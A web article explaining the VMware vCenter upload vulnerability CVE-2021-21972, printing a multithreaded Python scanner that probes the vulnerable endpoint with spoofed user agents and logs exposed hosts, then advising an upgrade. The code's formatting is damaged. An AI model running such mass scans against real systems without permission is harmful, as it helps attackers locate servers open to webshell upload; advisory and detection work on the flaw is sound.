About the VMware vcenter unauthorized arbitrary file upload vulnerability (CVE-2021-21972)
backgroundCVE-2021-21972 An unauthenticated command execution vulnerability in VMware vCenter. This vulnerability can upload a webshell to any location on the vcenter server and then execute the webshell. Affected versions vmware:esxi:7.0/6.7/6.5 Vulnerability reproduction fofa query Syntax:
POC
Use
#-*- coding:utf-8 -*-
banner = """
888888ba dP
88 `8b 88
a88aaaa8P' .d8888b. d8888P .d8888b. dP dP
88 `8b. 88' `88 88 Y8ooooo. 88 88
88 .88 88. .88 88 88 88. .88
88888888P `88888P8 dP `88888P' `88888P'
ooooooooooooooooooooooooooooooooooooooooooooooooooooo
@time:2021/02/24 CVE-2021-21972.py
C0de by NebulabdSec - @batsu
"""
print(banner)
import threadpool
import random
import requests
import argparse
import http.client
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
TARGET_URI = "/ui/vropspluginui/rest/services/uploadova"
def get_ua():
first_num = random.randint(55, 62)
third_num = random.randint(0, 3200)
fourth_num = random.randint(0, 140)
os_type = [
'(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',
'(Macintosh; Intel Mac OS X 10_12_6)'
]
chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)
ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
'(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
)
return ua
def CVE_2021_21972(url):
proxies = {"scoks5": "http://127.0.0.1:1081"}
headers = {
'User-Agent': get_ua(),
"Content-Type": "application/x-www-form-urlencoded"
}
targetUrl = url + TARGET_URI
try:
res = requests.get(targetUrl,
headers=headers,
timeout=15,
verify=False,
proxies=proxies)
# proxies={'socks5': 'http://127.0.0.1:1081'})
# print(len(res.text))
if res.status_code == 405:
print("[+] URL:{}--------CVE-2021-21972 vulnerability exists".format(url))
# print("[+] Command success result: " + res.text + "\n")
with open("vulnerability address.txt", 'a') as fw:
fw.write(url + '\n')
else:
print("[-] " + url + " No CVE-2021-21972 vulnerability was found.\n")
# except Exception as e:
# print(e)
except:
print("[-] " + url + " Request ERROR.\n")
def multithreading(filename, pools=5):
works = []
with open(filename, "r") as f:
for i in f:
func_params = [i.rstrip("\n")]
# func_params = [i] + [cmd]
works.append((func_params, None))
pool = threadpool.ThreadPool(pools)
reqs = threadpool.makeRequests(CVE_2021_21972, works)
[pool.putRequest(req) for req in reqs]
pool.wait()
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-u",
"--url",
help="Target URL; Example:http://ip:port")
parser.add_argument("-f",
"--file",
help="Url File; Example:url.txt")
# parser.add_argument("-c", "--cmd", help="Commands to be executed; ")
args = parser.parse_args()
url = args.url
# cmd = args.cmd
file_path = args.file
if url != None and file_path ==None:
CVE_2021_21972(url)
elif url == None and file_path != None:
multithreading(file_path, 10) # default 15 threads if __name__ == "__main__":
main()
EXP Repair Suggestions Upgrade vCenter Server 7.0 to 7.0.U1c This is the end of this article about the VMware vcenter unauthorized arbitrary file upload vulnerability (CVE-2021-21972). For more related VMware vcenter upload vulnerability content, please search 123WORDPRESS.COM's previous articles or continue to browse the following related articles. I hope everyone will support 123WORDPRESS.COM in the future! You may also be interested in:
|
<<: Introduction to query commands for MySQL stored procedures
>>: Vue makes div height draggable
Recommend
How to use Docker Swarm to build WordPress
cause I once set up WordPress on Vultr, but for w...
Understand the difference between BR and P tags through examples
<br />Use of line break tag<br>The lin...
Basic usage of @Font-face and how to make it compatible with all browsers
@Font-face basic introduction: @font-face is a CSS...
Tomcat security specifications (tomcat security reinforcement and specifications)
tomcat is an open source web server. The web base...
How to let https website send referrer https and http jump referrer
This article describes a proposal for a metadata ...
MySQL Community Server 5.7.19 Installation Guide (Detailed)
MySQL official website zip file download link htt...
How to write memory-efficient applications with Node.js
Table of contents Preface Problem: Large file cop...
Solution to Django's inability to access static resources with uwsgi+nginx proxy
When deploying uwsgi+nginx proxy Django, access u...
How to configure MySQL scheduled tasks (EVENT events) in detail
Table of contents 1. What is an event? 2. Enable ...
Detailed explanation of :key in VUE v-for
When key is not added to the v-for tag. <!DOCT...
Processing ideas for decrypting WeChat applet packages on PC in node.js
Table of contents Where is the source code of the...
CSS3 to achieve dynamic background gradient effect
Learning CSS3 is more about getting familiar with...
Detailed explanation of the visualization component using Vue to compare the differences between two sets of data
Table of contents need: Main points: According to...
HTML implements the function of detecting input completion
Use "onInput(event)" to detect whether ...
React tsx generates random verification code
React tsx generates a random verification code fo...